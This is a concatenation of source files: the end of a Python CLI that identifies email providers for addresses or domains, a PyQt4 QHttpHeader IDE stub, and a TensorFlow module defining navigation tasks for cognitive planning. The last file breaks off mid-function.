>>> main_internal(['[email protected]']) # doctest: +ELLIPSIS
[email protected],google-gmail...
>>> main_internal(['[email protected]', '-p', '[email protected]']) # doctest: +ELLIPSIS
[email protected],hard-fail,...
>>> main_internal(['example.com', '-v'])
[
{"canonical": null, "domain": "example.com", "match": ["nomx"], "mx": [], "providers": [], "public": false, "query": "example.com"}
]
>>> main_internal(['Example <[email protected]>', '-v']) # doctest: +ELLIPSIS
[
{"canonical": "[email protected]", "domain": "googlemail.com", "match": ["google-gmail"], "mx": [...], "providers": [...], "public": true, "query": "Example <[email protected]>"}
]
"""
import argparse
import json
from multiprocessing.dummy import Pool
try: # pragma: no cover
import unicodecsv as csv
except ImportError:
import csv
parser = argparse.ArgumentParser(
prog=name,
description="Identify email service providers given an email address, URL or"
" domain name",
fromfile_prefix_chars='@',
)
parser.add_argument(
'names',
metavar='email_or_url',
nargs='+',
help="email or URL to look up; use @filename to load from a file",
)
parser.add_argument(
'-v', '--verbose', action='store_true', help="return verbose results in JSON"
)
parser.add_argument(
'-i',
'--ignore-errors',
action='store_true',
help="ignore DNS lookup errors and continue with next item",
)
parser.add_argument(
'-t',
'--timeout',
type=int,
metavar='T',
default=30,
help="DNS timeout in seconds (default: %(default)s)",
)
parser.add_argument(
'-p',
'--probe',
metavar='your_email',
default=None,
help="probe whether target email address exists (needs your email to perform"
" the test)",
)
args = parser.parse_args(args)
# Assume non-Unicode names to be in UTF-8
names = [
n.decode('utf-8') if not isinstance(n, text_type) else n for n in args.names
]
pool = Pool(processes=10 if not args.probe else 1)
it = pool.imap_unordered(
partial(
mxsniff_and_probe,
probe_email=args.probe,
ignore_errors=args.ignore_errors,
timeout=args.timeout,
use_static_domains=False,
),
names,
10,
)
try:
if args.verbose:
# Valid JSON output hack
firstline = True
print('[') # NOQA: T001
for result in it:
if firstline:
firstline = False
else:
print(',') # NOQA: T001
print(json.dumps(result, sort_keys=True), end='') # NOQA: T001
print('\n]') # NOQA: T001
else:
out = csv.writer(sys.stdout)
for result in it:
if args.probe:
out.writerow([result['query']] + list(result['probe']))
else:
out.writerow([result['query']] + result['match'])
except KeyboardInterrupt: # pragma: no cover
pool.terminate()
raise
def main(): # pragma: no cover
import os.path
return main_internal(sys.argv[1:], os.path.basename(sys.argv[0]))
if __name__ == '__main__':
sys.exit(main())
| bsd-2-clause | -7,346,651,478,814,154,000 | 33.499124 | 194 | 0.581095 | false |
ProfessorX/Config | .PyCharm30/system/python_stubs/-1247972723/PyQt4/QtNetwork/__init__/QHttpHeader.py | 2 | 4106 | # encoding: utf-8
# module PyQt4.QtNetwork
# from /usr/lib/python2.7/dist-packages/PyQt4/QtNetwork.so
# by generator 1.135
# no doc
# imports
import PyQt4.QtCore as __PyQt4_QtCore
class QHttpHeader(): # skipped bases: <type 'sip.simplewrapper'>
"""
QHttpHeader()
QHttpHeader(QHttpHeader)
QHttpHeader(QString)
"""
def addValue(self, QString, QString_1): # real signature unknown; restored from __doc__
""" QHttpHeader.addValue(QString, QString) """
pass
def allValues(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.allValues(QString) -> QStringList """
pass
def contentLength(self): # real signature unknown; restored from __doc__
""" QHttpHeader.contentLength() -> int """
return 0
def contentType(self): # real signature unknown; restored from __doc__
""" QHttpHeader.contentType() -> QString """
pass
def hasContentLength(self): # real signature unknown; restored from __doc__
""" QHttpHeader.hasContentLength() -> bool """
return False
def hasContentType(self): # real signature unknown; restored from __doc__
""" QHttpHeader.hasContentType() -> bool """
return False
def hasKey(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.hasKey(QString) -> bool """
return False
def isValid(self): # real signature unknown; restored from __doc__
""" QHttpHeader.isValid() -> bool """
return False
def keys(self): # real signature unknown; restored from __doc__
""" QHttpHeader.keys() -> QStringList """
pass
def majorVersion(self): # real signature unknown; restored from __doc__
""" QHttpHeader.majorVersion() -> int """
return 0
def minorVersion(self): # real signature unknown; restored from __doc__
""" QHttpHeader.minorVersion() -> int """
return 0
def parse(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.parse(QString) -> bool """
return False
def parseLine(self, QString, p_int): # real signature unknown; restored from __doc__
""" QHttpHeader.parseLine(QString, int) -> bool """
return False
def removeAllValues(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.removeAllValues(QString) """
pass
def removeValue(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.removeValue(QString) """
pass
def setContentLength(self, p_int): # real signature unknown; restored from __doc__
""" QHttpHeader.setContentLength(int) """
pass
def setContentType(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.setContentType(QString) """
pass
def setValid(self, bool): # real signature unknown; restored from __doc__
""" QHttpHeader.setValid(bool) """
pass
def setValue(self, QString, QString_1): # real signature unknown; restored from __doc__
""" QHttpHeader.setValue(QString, QString) """
pass
def setValues(self, list_of_tuple_of_QString_QString): # real signature unknown; restored from __doc__
""" QHttpHeader.setValues(list-of-tuple-of-QString-QString) """
pass
def toString(self): # real signature unknown; restored from __doc__
""" QHttpHeader.toString() -> QString """
pass
def value(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.value(QString) -> QString """
pass
def values(self): # real signature unknown; restored from __doc__
""" QHttpHeader.values() -> list-of-tuple-of-QString-QString """
pass
def __init__(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
pass
__weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""list of weak references to the object (if defined)"""
| gpl-2.0 | -6,210,554,165,270,295,000 | 34.396552 | 106 | 0.628105 | false |
cshallue/models | research/cognitive_planning/tasks.py | 5 | 59475 | # Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A library of tasks.
This interface is intended to implement a wide variety of navigation
tasks. See go/navigation_tasks for a list.
"""
import abc
import collections
import math
import threading
import networkx as nx
import numpy as np
import tensorflow as tf
#from pyglib import logging
#import gin
from envs import task_env
from envs import util as envs_util
# Utility functions.
def _pad_or_clip_array(np_arr, arr_len, is_front_clip=True, output_mask=False):
"""Make np_arr array to have length arr_len.
  If the array is shorter than arr_len, then it is padded at the end with
  zeros. If it is longer, then it is clipped either from the back or from the
front. Only the first dimension is modified.
Args:
np_arr: numpy array.
arr_len: integer scalar.
is_front_clip: a boolean. If true then clipping is done in the front,
otherwise in the back.
output_mask: If True, outputs a numpy array of rank 1 which represents
a mask of which values have been added (0 - added, 1 - actual output).
Returns:
A numpy array and the size of padding (as a python int32). This size is
    negative if the array is clipped.
"""
shape = list(np_arr.shape)
pad_size = arr_len - shape[0]
padded_or_clipped = None
if pad_size < 0:
if is_front_clip:
padded_or_clipped = np_arr[-pad_size:, :]
else:
padded_or_clipped = np_arr[:arr_len, :]
elif pad_size > 0:
padding = np.zeros([pad_size] + shape[1:], dtype=np_arr.dtype)
padded_or_clipped = np.concatenate([np_arr, padding], axis=0)
else:
padded_or_clipped = np_arr
if output_mask:
mask = np.ones((arr_len,), dtype=np.int)
if pad_size > 0:
mask[-pad_size:] = 0
return padded_or_clipped, pad_size, mask
else:
return padded_or_clipped, pad_size
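# A quick illustration of _pad_or_clip_array (shapes are hypothetical): a
# (2, 3) array padded to arr_len=4 gains two zero rows at the end with
# pad_size=2, while a (5, 3) array clipped to arr_len=4 with is_front_clip=True
# loses its first row and pad_size=-1. For example:
#   arr, pad = _pad_or_clip_array(np.zeros((2, 3)), 4)  # arr.shape == (4, 3)
#   arr, pad = _pad_or_clip_array(np.zeros((5, 3)), 4)  # arr.shape == (4, 3)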
def classification_loss(truth, predicted, weights=None, is_one_hot=True):
"""A cross entropy loss.
Computes the mean of cross entropy losses for all pairs of true labels and
predictions. It wraps around a tf implementation of the cross entropy loss
  with additional reformatting of the inputs. If the truth and predicted are
n-rank Tensors with n > 2, then these are reshaped to 2-rank Tensors. It
allows for truth to be specified as one hot vector or class indices. Finally,
a weight can be specified for each element in truth and predicted.
Args:
truth: an n-rank or (n-1)-rank Tensor containing labels. If is_one_hot is
True, then n-rank Tensor is expected, otherwise (n-1) rank one.
predicted: an n-rank float Tensor containing prediction probabilities.
weights: an (n-1)-rank float Tensor of weights
is_one_hot: a boolean.
Returns:
A TF float scalar.
"""
num_labels = predicted.get_shape().as_list()[-1]
if not is_one_hot:
truth = tf.reshape(truth, [-1])
truth = tf.one_hot(
truth, depth=num_labels, on_value=1.0, off_value=0.0, axis=-1)
else:
truth = tf.reshape(truth, [-1, num_labels])
predicted = tf.reshape(predicted, [-1, num_labels])
losses = tf.nn.softmax_cross_entropy_with_logits(
labels=truth, logits=predicted)
if weights is not None:
losses = tf.boolean_mask(losses,
tf.cast(tf.reshape(weights, [-1]), dtype=tf.bool))
return tf.reduce_mean(losses)
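# Shape sketch for classification_loss (sizes are illustrative, not used
# elsewhere): with is_one_hot=True, truth and predicted are e.g.
# [batch, seq_len, num_labels] and weights is [batch, seq_len]; with
# is_one_hot=False, truth instead holds integer class indices. A typical call:
#   loss = classification_loss(truth=tf.one_hot(labels, 4), predicted=logits)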
class UnrolledTaskIOConfig(object):
"""Configuration of task inputs and outputs.
A task can have multiple inputs, which define the context, and a task query
which defines what is to be executed in this context. The desired execution
is encoded in an output. The config defines the shapes of the inputs, the
query and the outputs.
"""
def __init__(self, inputs, output, query=None):
"""Constructs a Task input/output config.
Args:
inputs: a list of tuples. Each tuple represents the configuration of an
input, with first element being the type (a string value) and the second
element the shape.
output: a tuple representing the configuration of the output.
query: a tuple representing the configuration of the query. If no query,
then None.
"""
    # A configuration of a single input, output or query. Consists of the type,
    # which is a tf.DType, and a shape. The shape must be consistent with the
    # type, e.g. an image input would have a 3-valued shape list.
io_config = collections.namedtuple('IOConfig', ['type', 'shape'])
def assert_config(config):
if not isinstance(config, tuple):
raise ValueError('config must be a tuple. Received {}'.format(
type(config)))
if len(config) != 2:
raise ValueError('config must have 2 elements, has %d' % len(config))
if not isinstance(config[0], tf.DType):
raise ValueError('First element of config must be a tf.DType.')
if not isinstance(config[1], list):
raise ValueError('Second element of config must be a list.')
assert isinstance(inputs, collections.OrderedDict)
for modality_type in inputs:
assert_config(inputs[modality_type])
self._inputs = collections.OrderedDict(
[(k, io_config(*value)) for k, value in inputs.iteritems()])
if query is not None:
assert_config(query)
self._query = io_config(*query)
else:
self._query = None
assert_config(output)
self._output = io_config(*output)
@property
def inputs(self):
return self._inputs
@property
def output(self):
return self._output
@property
def query(self):
return self._query
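# A minimal, hypothetical construction of the config above (the modality name
# and shapes are assumptions for illustration only):
#   config = UnrolledTaskIOConfig(
#       inputs=collections.OrderedDict(
#           [('IMAGE', (tf.float32, [8, 64, 64, 3]))]),
#       output=(tf.float32, [8, 4]),
#       query=(tf.float32, [64, 64, 3]))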
class UnrolledTask(object):
"""An interface for a Task which can be unrolled during training.
  Each example is called an episode and consists of inputs and a target output,
  where the output can be considered as the desired unrolled sequence of actions
  for the inputs. For the specified tasks, these action sequences are to be
unambiguously definable.
"""
__metaclass__ = abc.ABCMeta
def __init__(self, config):
assert isinstance(config, UnrolledTaskIOConfig)
self._config = config
# A dict of bookkeeping variables.
self.info = {}
# Tensorflow input is multithreaded and this lock is needed to prevent
# race condition in the environment. Without the lock, non-thread safe
# environments crash.
self._lock = threading.Lock()
@property
def config(self):
return self._config
@abc.abstractmethod
def episode(self):
"""Returns data needed to train and test a single episode.
Each episode consists of inputs, which define the context of the task, a
query which defines the task, and a target output, which defines a
sequence of actions to be executed for this query. This sequence should not
    require feedback, i.e. can be predicted purely from input and query.
Returns:
inputs, query, output, where inputs is a list of numpy arrays and query
and output are numpy arrays. These arrays must be of shape and type as
specified in the task configuration.
"""
pass
def reset(self, observation):
"""Called after the environment is reset."""
pass
def episode_batch(self, batch_size):
"""Returns a batch of episodes.
Args:
batch_size: size of batch.
Returns:
(inputs, query, output, masks) where inputs is list of numpy arrays and
query, output, and mask are numpy arrays. These arrays must be of shape
and type as specified in the task configuration with one additional
preceding dimension corresponding to the batch.
Raises:
ValueError: if self.episode() returns illegal values.
"""
batched_inputs = collections.OrderedDict(
[[mtype, []] for mtype in self.config.inputs])
batched_queries = []
batched_outputs = []
batched_masks = []
for _ in range(int(batch_size)):
with self._lock:
# The episode function needs to be thread-safe. Since the current
        # implementation for the envs is not thread safe we need to lock
# the operations here.
inputs, query, outputs = self.episode()
if not isinstance(outputs, tuple):
raise ValueError('Outputs return value must be tuple.')
if len(outputs) != 2:
raise ValueError('Output tuple must be of size 2.')
if inputs is not None:
for modality_type in batched_inputs:
batched_inputs[modality_type].append(
np.expand_dims(inputs[modality_type], axis=0))
if query is not None:
batched_queries.append(np.expand_dims(query, axis=0))
batched_outputs.append(np.expand_dims(outputs[0], axis=0))
if outputs[1] is not None:
batched_masks.append(np.expand_dims(outputs[1], axis=0))
batched_inputs = {
k: np.concatenate(i, axis=0) for k, i in batched_inputs.iteritems()
}
if batched_queries:
batched_queries = np.concatenate(batched_queries, axis=0)
batched_outputs = np.concatenate(batched_outputs, axis=0)
if batched_masks:
batched_masks = np.concatenate(batched_masks, axis=0).astype(np.float32)
else:
# When the array is empty, the default np.dtype is float64 which causes
# py_func to crash in the tests.
batched_masks = np.array([], dtype=np.float32)
batched_inputs = [batched_inputs[k] for k in self._config.inputs]
return batched_inputs, batched_queries, batched_outputs, batched_masks
def tf_episode_batch(self, batch_size):
"""A batch of episodes as TF Tensors.
Same as episode_batch with the difference that the return values are TF
Tensors.
Args:
batch_size: a python float for the batch size.
Returns:
inputs, query, output, mask where inputs is a dictionary of tf.Tensor
where the keys are the modality types specified in the config.inputs.
query, output, and mask are TF Tensors. These tensors must
be of shape and type as specified in the task configuration with one
additional preceding dimension corresponding to the batch. Both mask and
output have the same shape as output.
"""
# Define TF outputs.
touts = []
shapes = []
for _, i in self._config.inputs.iteritems():
touts.append(i.type)
shapes.append(i.shape)
if self._config.query is not None:
touts.append(self._config.query.type)
shapes.append(self._config.query.shape)
# Shapes and types for batched_outputs.
touts.append(self._config.output.type)
shapes.append(self._config.output.shape)
# Shapes and types for batched_masks.
touts.append(self._config.output.type)
shapes.append(self._config.output.shape[0:1])
def episode_batch_func():
if self.config.query is None:
inp, _, output, masks = self.episode_batch(int(batch_size))
return tuple(inp) + (output, masks)
else:
inp, query, output, masks = self.episode_batch(int(batch_size))
return tuple(inp) + (query, output, masks)
tf_episode_batch = tf.py_func(episode_batch_func, [], touts,
stateful=True, name='taskdata')
for episode, shape in zip(tf_episode_batch, shapes):
episode.set_shape([batch_size] + shape)
tf_episode_batch_dict = collections.OrderedDict([
(mtype, episode)
for mtype, episode in zip(self.config.inputs.keys(), tf_episode_batch)
])
cur_index = len(self.config.inputs.keys())
tf_query = None
if self.config.query is not None:
tf_query = tf_episode_batch[cur_index]
cur_index += 1
tf_outputs = tf_episode_batch[cur_index]
tf_masks = tf_episode_batch[cur_index + 1]
return tf_episode_batch_dict, tf_query, tf_outputs, tf_masks
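  # Shape sketch (illustrative): with batch_size=B, each entry of
  # tf_episode_batch_dict has shape [B] + config.inputs[k].shape, tf_outputs
  # has shape [B] + config.output.shape and tf_masks has shape
  # [B, config.output.shape[0]].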
@abc.abstractmethod
def target_loss(self, true_targets, targets, weights=None):
"""A loss for training a task model.
This loss measures the discrepancy between the task outputs, the true and
predicted ones.
Args:
true_targets: tf.Tensor of shape and type as defined in the task config
containing the true outputs.
targets: tf.Tensor of shape and type as defined in the task config
containing the predicted outputs.
weights: a bool tf.Tensor of shape as targets. Only true values are
considered when formulating the loss.
"""
pass
def reward(self, obs, done, info):
"""Returns a reward.
    The task has to compute a reward based on the state of the environment. The
reward computation, though, is task specific. The task is to use the
environment interface, as defined in task_env.py, to compute the reward. If
this interface does not expose enough information, it is to be updated.
Args:
obs: Observation from environment's step function.
done: Done flag from environment's step function.
info: Info dict from environment's step function.
Returns:
obs: Observation.
reward: Floating point value.
done: Done flag.
info: Info dict.
"""
# Default implementation does not do anything.
return obs, 0.0, done, info
class RandomExplorationBasedTask(UnrolledTask):
"""A Task which starts with a random exploration of the environment."""
def __init__(self,
env,
seed,
add_query_noise=False,
query_noise_var=0.0,
*args,
**kwargs): # pylint: disable=keyword-arg-before-vararg
"""Initializes a Task using a random exploration runs.
Args:
env: an instance of type TaskEnv and gym.Env.
seed: a random seed.
add_query_noise: boolean, if True then whatever queries are generated,
they are randomly perturbed. The semantics of the queries depends on the
concrete task implementation.
query_noise_var: float, the variance of Gaussian noise used for query
perturbation. Used iff add_query_noise==True.
*args: see super class.
**kwargs: see super class.
"""
super(RandomExplorationBasedTask, self).__init__(*args, **kwargs)
assert isinstance(env, task_env.TaskEnv)
self._env = env
self._env.set_task(self)
self._rng = np.random.RandomState(seed)
self._add_query_noise = add_query_noise
self._query_noise_var = query_noise_var
# GoToStaticXTask can also take empty config but for the rest of the classes
# the number of modality types is 1.
if len(self.config.inputs.keys()) > 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type or less.')
def _exploration(self):
"""Generates a random exploration run.
The function uses the environment to generate a run.
Returns:
A tuple of numpy arrays. The i-th array contains observation of type and
shape as specified in config.inputs[i].
A list of states along the exploration path.
A list of vertex indices corresponding to the path of the exploration.
"""
in_seq_len = self._config.inputs.values()[0].shape[0]
path, _, states, step_outputs = self._env.random_step_sequence(
min_len=in_seq_len)
obs = {modality_type: [] for modality_type in self._config.inputs}
for o in step_outputs:
step_obs, _, done, _ = o
# It is expected that each value of step_obs is a dict of observations,
# whose dimensions are consistent with the config.inputs sizes.
for modality_type in self._config.inputs:
assert modality_type in step_obs, '{}'.format(type(step_obs))
o = step_obs[modality_type]
i = self._config.inputs[modality_type]
assert len(o.shape) == len(i.shape) - 1
for dim_o, dim_i in zip(o.shape, i.shape[1:]):
assert dim_o == dim_i, '{} != {}'.format(dim_o, dim_i)
obs[modality_type].append(o)
if done:
break
if not obs:
return obs, states, path
max_path_len = int(
round(in_seq_len * float(len(path)) / float(len(obs.values()[0]))))
path = path[-max_path_len:]
states = states[-in_seq_len:]
# The above obs is a list of tuples of np,array. Re-format them as tuple of
# np.array, each array containing all observations from all steps.
def regroup(obs, i):
"""Regroups observations.
Args:
obs: a list of tuples of same size. The k-th tuple contains all the
observations from k-th step. Each observation is a numpy array.
i: the index of the observation in each tuple to be grouped.
Returns:
A numpy array of shape config.inputs[i] which contains all i-th
observations from all steps. These are concatenated along the first
dimension. In addition, if the number of observations is different from
the one specified in config.inputs[i].shape[0], then the array is either
padded from front or clipped.
"""
grouped_obs = np.concatenate(
[np.expand_dims(o, axis=0) for o in obs[i]], axis=0)
in_seq_len = self._config.inputs[i].shape[0]
# pylint: disable=unbalanced-tuple-unpacking
grouped_obs, _ = _pad_or_clip_array(
grouped_obs, in_seq_len, is_front_clip=True)
return grouped_obs
all_obs = {i: regroup(obs, i) for i in self._config.inputs}
return all_obs, states, path
def _obs_to_state(self, path, states):
"""Computes mapping between path nodes and states."""
# Generate a numpy array of locations corresponding to the path vertices.
path_coordinates = map(self._env.vertex_to_pose, path)
path_coordinates = np.concatenate(
[np.reshape(p, [1, 2]) for p in path_coordinates])
# The observations are taken along a smoothed trajectory following the path.
    # We compute a mapping between the observations and the map vertices.
path_to_obs = collections.defaultdict(list)
obs_to_state = []
for i, s in enumerate(states):
location = np.reshape(s[0:2], [1, 2])
index = np.argmin(
np.reshape(
np.sum(np.power(path_coordinates - location, 2), axis=1), [-1]))
index = path[index]
path_to_obs[index].append(i)
obs_to_state.append(index)
return path_to_obs, obs_to_state
def _perturb_state(self, state, noise_var):
"""Perturbes the state.
The location are purturbed using a Gaussian noise with variance
noise_var. The orientation is uniformly sampled.
Args:
state: a numpy array containing an env state (x, y locations).
noise_var: float
Returns:
The perturbed state.
"""
def normal(v, std):
if std > 0:
n = self._rng.normal(0.0, std)
n = min(n, 2.0 * std)
n = max(n, -2.0 * std)
return v + n
else:
return v
state = state.copy()
state[0] = normal(state[0], noise_var)
state[1] = normal(state[1], noise_var)
if state.size > 2:
state[2] = self._rng.uniform(-math.pi, math.pi)
return state
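  # Example (illustrative values): for state [1.0, 2.0, 0.3] and noise_var 0.1,
  # the x/y entries receive Gaussian noise clipped to [-0.2, 0.2] and the
  # orientation is resampled uniformly in [-pi, pi).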
def _sample_obs(self,
indices,
observations,
observation_states,
path_to_obs,
max_obs_index=None,
use_exploration_obs=True):
"""Samples one observation which corresponds to vertex_index in path.
In addition, the sampled observation must have index in observations less
than max_obs_index. If these two conditions cannot be satisfied the
function returns None.
Args:
indices: a list of integers.
observations: a list of numpy arrays containing all the observations.
observation_states: a list of numpy arrays, each array representing the
state of the observation.
path_to_obs: a dict of path indices to lists of observation indices.
max_obs_index: an integer.
use_exploration_obs: if True, then the observation is sampled among the
specified observations, otherwise it is obtained from the environment.
Returns:
A tuple of:
-- A numpy array of size width x height x 3 representing the sampled
observation.
        -- The index of the sampled observation among the input observations.
-- The state at which the observation is captured.
Raises:
ValueError: if the observation and observation_states lists are of
different lengths.
"""
if len(observations) != len(observation_states):
raise ValueError('observation and observation_states lists must have '
'equal lengths')
if not indices:
return None, None, None
vertex_index = self._rng.choice(indices)
if use_exploration_obs:
obs_indices = path_to_obs[vertex_index]
if max_obs_index is not None:
obs_indices = [i for i in obs_indices if i < max_obs_index]
if obs_indices:
index = self._rng.choice(obs_indices)
if self._add_query_noise:
xytheta = self._perturb_state(observation_states[index],
self._query_noise_var)
return self._env.observation(xytheta), index, xytheta
else:
return observations[index], index, observation_states[index]
else:
return None, None, None
else:
xy = self._env.vertex_to_pose(vertex_index)
xytheta = np.array([xy[0], xy[1], 0.0])
xytheta = self._perturb_state(xytheta, self._query_noise_var)
return self._env.observation(xytheta), None, xytheta
class AreNearbyTask(RandomExplorationBasedTask):
"""A task of identifying whether a query is nearby current location or not.
The query is guaranteed to be in proximity of an already visited location,
i.e. close to one of the observations. For each observation we have one
query, which is either close or not to this observation.
"""
def __init__(
self,
max_distance=0,
*args,
**kwargs): # pylint: disable=keyword-arg-before-vararg
super(AreNearbyTask, self).__init__(*args, **kwargs)
self._max_distance = max_distance
if len(self.config.inputs.keys()) != 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type')
def episode(self):
"""Episode data.
Returns:
observations: a tuple with one element. This element is a numpy array of
size in_seq_len x observation_size x observation_size x 3 containing
in_seq_len images.
query: a numpy array of size
in_seq_len x observation_size X observation_size x 3 containing a query
image.
A tuple of size two. First element is a in_seq_len x 2 numpy array of
either 1.0 or 0.0. The i-th element denotes whether the i-th query
      image is nearby (value 1.0) or not (value 0.0) to the i-th observation.
The second element in the tuple is a mask, a numpy array of size
in_seq_len x 1 and values 1.0 or 0.0 denoting whether the query is
valid or not (it can happen that the query is not valid, e.g. there are
      not enough observations to have a meaningful query).
"""
observations, states, path = self._exploration()
assert len(observations.values()[0]) == len(states)
# The observations are taken along a smoothed trajectory following the path.
    # We compute a mapping between the observations and the map vertices.
path_to_obs, obs_to_path = self._obs_to_state(path, states)
# Go over all observations, and sample a query. With probability 0.5 this
# query is a nearby observation (defined as belonging to the same vertex
# in path).
g = self._env.graph
queries = []
labels = []
validity_masks = []
query_index_in_observations = []
for i, curr_o in enumerate(observations.values()[0]):
p = obs_to_path[i]
low = max(0, i - self._max_distance)
# A list of lists of vertex indices. Each list in this group corresponds
# to one possible label.
index_groups = [[], [], []]
# Nearby visited indices, label 1.
nearby_visited = [
ii for ii in path[low:i + 1] + g[p].keys() if ii in obs_to_path[:i]
]
      nearby_visited = [ii for ii in nearby_visited if ii in path_to_obs]
# NOT Nearby visited indices, label 0.
not_nearby_visited = [ii for ii in path[:low] if ii not in g[p].keys()]
      not_nearby_visited = [
          ii for ii in not_nearby_visited if ii in path_to_obs
      ]
# NOT visited indices, label 2.
not_visited = [
ii for ii in range(g.number_of_nodes()) if ii not in path[:i + 1]
]
index_groups = [not_nearby_visited, nearby_visited, not_visited]
# Consider only labels for which there are indices.
allowed_labels = [ii for ii, group in enumerate(index_groups) if group]
label = self._rng.choice(allowed_labels)
indices = list(set(index_groups[label]))
max_obs_index = None if label == 2 else i
use_exploration_obs = False if label == 2 else True
o, obs_index, _ = self._sample_obs(
indices=indices,
observations=observations.values()[0],
observation_states=states,
path_to_obs=path_to_obs,
max_obs_index=max_obs_index,
use_exploration_obs=use_exploration_obs)
query_index_in_observations.append(obs_index)
# If we cannot sample a valid query, we mark it as not valid in mask.
if o is None:
label = 0.0
o = curr_o
validity_masks.append(0)
else:
validity_masks.append(1)
queries.append(o.values()[0])
labels.append(label)
query = np.concatenate([np.expand_dims(q, axis=0) for q in queries], axis=0)
def one_hot(label, num_labels=3):
a = np.zeros((num_labels,), dtype=np.float)
a[int(label)] = 1.0
return a
outputs = np.stack([one_hot(l) for l in labels], axis=0)
validity_mask = np.reshape(
np.array(validity_masks, dtype=np.int32), [-1, 1])
self.info['query_index_in_observations'] = query_index_in_observations
self.info['observation_states'] = states
return observations, query, (outputs, validity_mask)
def target_loss(self, truth, predicted, weights=None):
pass
class NeighboringQueriesTask(RandomExplorationBasedTask):
"""A task of identifying whether two queries are closeby or not.
The proximity between queries is defined by the length of the shorest path
between them.
"""
def __init__(
self,
max_distance=1,
*args,
**kwargs): # pylint: disable=keyword-arg-before-vararg
"""Initializes a NeighboringQueriesTask.
Args:
max_distance: integer, the maximum distance in terms of number of vertices
between the two queries, so that they are considered neighboring.
*args: for super class.
**kwargs: for super class.
"""
super(NeighboringQueriesTask, self).__init__(*args, **kwargs)
self._max_distance = max_distance
if len(self.config.inputs.keys()) != 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type')
def episode(self):
"""Episode data.
Returns:
observations: a tuple with one element. This element is a numpy array of
size in_seq_len x observation_size x observation_size x 3 containing
in_seq_len images.
query: a numpy array of size
2 x observation_size X observation_size x 3 containing a pair of query
images.
A tuple of size two. First element is a numpy array of size 2 containing
      a one hot vector of whether the two observations are neighboring. Second
element is a boolean numpy value denoting whether this is a valid
episode.
"""
observations, states, path = self._exploration()
assert len(observations.values()[0]) == len(states)
path_to_obs, _ = self._obs_to_state(path, states)
# Restrict path to ones for which observations have been generated.
path = [p for p in path if p in path_to_obs]
# Sample first query.
query1_index = self._rng.choice(path)
# Sample label.
label = self._rng.randint(2)
# Sample second query.
# If label == 1, then second query must be nearby, otherwise not.
closest_indices = nx.single_source_shortest_path(
self._env.graph, query1_index, self._max_distance).keys()
if label == 0:
      # Indices on the path which are not near the first query.
indices = [p for p in path if p not in closest_indices]
else:
      # Indices near the first query which are also on the path.
indices = [p for p in closest_indices if p in path]
query2_index = self._rng.choice(indices)
# Generate an observation.
query1, query1_index, _ = self._sample_obs(
[query1_index],
observations.values()[0],
states,
path_to_obs,
max_obs_index=None,
use_exploration_obs=True)
query2, query2_index, _ = self._sample_obs(
[query2_index],
observations.values()[0],
states,
path_to_obs,
max_obs_index=None,
use_exploration_obs=True)
queries = np.concatenate(
[np.expand_dims(q, axis=0) for q in [query1, query2]])
labels = np.array([0, 0])
labels[label] = 1
is_valid = np.array([1])
self.info['observation_states'] = states
self.info['query_indices_in_observations'] = [query1_index, query2_index]
return observations, queries, (labels, is_valid)
def target_loss(self, truth, predicted, weights=None):
pass
#@gin.configurable
class GotoStaticXTask(RandomExplorationBasedTask):
"""Task go to a static X.
If continuous reward is used only one goal is allowed so that the reward can
  be computed as a delta-distance to that goal.
"""
def __init__(self,
step_reward=0.0,
goal_reward=1.0,
hit_wall_reward=-1.0,
done_at_target=False,
use_continuous_reward=False,
*args,
**kwargs): # pylint: disable=keyword-arg-before-vararg
super(GotoStaticXTask, self).__init__(*args, **kwargs)
if len(self.config.inputs.keys()) > 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type or less.')
self._step_reward = step_reward
self._goal_reward = goal_reward
self._hit_wall_reward = hit_wall_reward
self._done_at_target = done_at_target
self._use_continuous_reward = use_continuous_reward
self._previous_path_length = None
def episode(self):
observations, _, path = self._exploration()
if len(path) < 2:
raise ValueError('The exploration path has only one node.')
g = self._env.graph
start = path[-1]
while True:
goal = self._rng.choice(path[:-1])
if goal != start:
break
goal_path = nx.shortest_path(g, start, goal)
init_orientation = self._rng.uniform(0, np.pi, (1,))
trajectory = np.array(
[list(self._env.vertex_to_pose(p)) for p in goal_path])
init_xy = np.reshape(trajectory[0, :], [-1])
init_state = np.concatenate([init_xy, init_orientation], 0)
trajectory = trajectory[1:, :]
deltas = envs_util.trajectory_to_deltas(trajectory, init_state)
output_seq_len = self._config.output.shape[0]
arr = _pad_or_clip_array(deltas, output_seq_len, output_mask=True)
# pylint: disable=unbalanced-tuple-unpacking
thetas, _, thetas_mask = arr
query = self._env.observation(self._env.vertex_to_pose(goal)).values()[0]
return observations, query, (thetas, thetas_mask)
def reward(self, obs, done, info):
if 'wall_collision' in info and info['wall_collision']:
return obs, self._hit_wall_reward, done, info
reward = 0.0
current_vertex = self._env.pose_to_vertex(self._env.state)
if current_vertex in self._env.targets():
if self._done_at_target:
done = True
else:
obs = self._env.reset()
reward = self._goal_reward
else:
if self._use_continuous_reward:
if len(self._env.targets()) != 1:
raise ValueError(
'FindX task with continuous reward is assuming only one target.')
goal_vertex = self._env.targets()[0]
path_length = self._compute_path_length(goal_vertex)
reward = self._previous_path_length - path_length
self._previous_path_length = path_length
else:
reward = self._step_reward
return obs, reward, done, info
def _compute_path_length(self, goal_vertex):
current_vertex = self._env.pose_to_vertex(self._env.state)
path = nx.shortest_path(self._env.graph, current_vertex, goal_vertex)
assert len(path) >= 2
